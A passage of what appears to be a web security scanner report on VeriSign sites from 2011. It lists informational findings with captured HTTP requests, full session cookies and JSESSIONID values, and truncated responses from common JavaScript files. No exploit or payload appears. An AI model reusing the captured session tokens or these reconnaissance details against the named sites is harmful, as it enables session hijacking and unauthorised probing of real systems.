Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
Content-Length: 1103
X-TeaLeaf-Page-Objects: 0
Origin: https://trust-center.verisign.com
X-TeaLeaf-Page-Img-Fail: 1
X-TeaLeaf-Page-Render: 123
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.11.17.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719

<ClientEventSet PostTimeStamp="1315621658502" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID21H27M8S358R0.8013692023232579" TimeDuration="123" DateSince1970="1315621628481" >

...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:10 GMT
Server: Apache
Set-Cookie: TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 32
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<html>
<body>
OK
</body>
</html>

22.41. http://www.verisign.ch/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /

Request

GET /?tid=header-logo HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 31344

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...

22.42. http://www.verisign.ch/assets/global/js/leftnav.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /assets/global/js/leftnav.js

Request

GET /assets/global/js/leftnav.js HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Length: 4994
Content-Type: text/html

/**
* Version 2.0
* Author: Rob Perez
* Date: August 20, 2010
*
* Usage:
*
*    Set a flag at the beginning of generateLeftNav to modify expansion behavior of the nav if desired.
*
* Somew
...[SNIP]...

22.43. http://www.verisign.ch/assets/shared/js/jquery.url.packed.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /assets/shared/js/jquery.url.packed.js

Request

GET /assets/shared/js/jquery.url.packed.js HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Length: 1935
Content-Type: text/html

jQuery.url=function(){var segments={};var parsed={};var options={url:window.location,strictMode:false,key:["source","protocol","authority","userInfo","user","password","host","port","relative","path",
...[SNIP]...

22.44. http://www.verisign.ch/assets/shared/js/leftnav_new.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /assets/shared/js/leftnav_new.js

Request

GET /assets/shared/js/leftnav_new.js HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Length: 4994
Content-Type: text/html

/**
* Version 2.0
* Author: Rob Perez
* Date: August 20, 2010
*
* Usage:
*
*    Set a flag at the beginning of generateLeftNav to modify expansion behavior of the nav if desired.
*
* Somew
...[SNIP]...

22.45. http://www.verisign.ch/corporate/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /corporate/index.html

Request

GET /corporate/index.html?tid=footer HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 36193

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" languag
...[SNIP]...

22.46. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js

Request

GET /stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 22346

////////////////////////////////////
//Main JS functions for verisign.com
////////////////////////////////////

function findObj(n, d){
var p,i,x; if(!d) d=document;
if((p=n.indexOf("?"))>0&&pa
...[SNIP]...

22.47. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js

Request

GET /stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Length: 3364
Content-Type: text/html

/////////////////////////////////////////////////////////////////////////////
// Function : vrsnNavMenuElements
// Comments :
/////////////////////////////////////////////////////////////////////////
...[SNIP]...

22.48. http://www.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /

Request

GET / HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621516|session#1315621455064-973488#1315623316|PC#1315621455064-973488.19#1378693458; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.1.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:24:37 GMT
Content-Type: text/html
Content-Length: 34615

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...

22.49. http://www.verisign.com/authweb/global/assets/header/js/flyouts.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /authweb/global/assets/header/js/flyouts.js

Request

GET /authweb/global/assets/header/js/flyouts.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:18 GMT
Content-Type: text/html
Content-Length: 8048


//----------------------------------------//
// My Account M-flyout form functionality
//----------------------------------------//

$("#myacc_search_btn").click(function(){
   //document.get
...[SNIP]...

22.50. http://www.verisign.com/authweb/global/assets/header/js/header.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /authweb/global/assets/header/js/header.js

Request

GET /authweb/global/assets/header/js/header.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:18 GMT
Content-Length: 1558
Content-Type: text/html


/*******************************************
**             Header functions             **
*******************************************/
//----------------------------------------//
//Load Defaults when DOM i
...[SNIP]...

22.51. http://www.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /authweb/global/assets/header/js/jquery.autocomplete.js

Request

GET /authweb/global/assets/header/js/jquery.autocomplete.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:19 GMT
Content-Type: text/html
Content-Length: 22148

/*
* jQuery Autocomplete plugin 1.1
*
* Copyright (c) 2009 Jörn Zaefferer
*
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* ht
...[SNIP]...

22.52. http://www.verisign.com/authweb/global/assets/shared/images/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/images/favicon.ico

Request

GET /authweb/global/assets/shared/images/favicon.ico HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621614|session#1315621455064-973488#1315623414|PC#1315621455064-973488.19#1378693554; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:24:14 GMT
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:26:10 GMT
Content-Type: text/html

...[SNIP]...

22.53. http://www.verisign.com/authweb/global/assets/shared/js/globals.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/js/globals.js

Request

GET /authweb/global/assets/shared/js/globals.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:17 GMT
Content-Length: 3608
Content-Type: text/html


/*******************************************
**             Utility functions             **
*******************************************/


function linkPopUp(url) {
popupWin = window.open
...[SNIP]...

22.54. http://www.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.boxshadow.js

Request

GET /authweb/global/assets/shared/js/jquery.boxshadow.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:17 GMT
Content-Length: 1538
Content-Type: text/html

/* **
* jquery-boxshadow.js
*
* $(object).boxshadow({
* hOffset : 3,
* vOffset : 3,
* shadowblur : 3,
* color : '#808080'
* })
*
* If you are using this with IE, you should s
...[SNIP]...

22.55. http://www.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.cacheimage.js

Request

GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:17 GMT
Content-Length: 1356
Content-Type: text/html

/*
* cacheImage: a jQuery plugin
*
* cacheImage is a simple jQuery plugin for pre-caching images. The
* plugin can be used to eliminate flashes of unstyled content (FOUC) and
* improve perceived
...[SNIP]...

22.56. http://www.verisign.com/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js

Request

GET /authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:27:08 GMT
Content-Type: text/html
Content-Length: 15622

/*
* FancyBox - jQuery Plugin
* Simple and fancy lightbox alternative
*
* Examples and documentation at: http://fancybox.net
*
* Copyright (c) 2008 - 2010 Janis Skarnelis
* That said, it is har
...[SNIP]...

22.57. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.hover_intent.js

Request

GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:17 GMT
Content-Length: 1614
Content-Type: text/html

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @p
...[SNIP]...

22.58. http://www.verisign.com/authweb/global/assets/shared/js/jquery.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.js

Request

GET /authweb/global/assets/shared/js/jquery.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:16 GMT
Content-Type: text/html
Content-Length: 78803

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...

22.59. http://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/js/rotator.custom.js

Request

GET /authweb/global/assets/shared/js/rotator.custom.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/ssl/buy-ssl-certificates/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:59:43 GMT
Content-Length: 985
Content-Type: text/html

$(document).ready (function(){
   bannerFadeIn = 0;
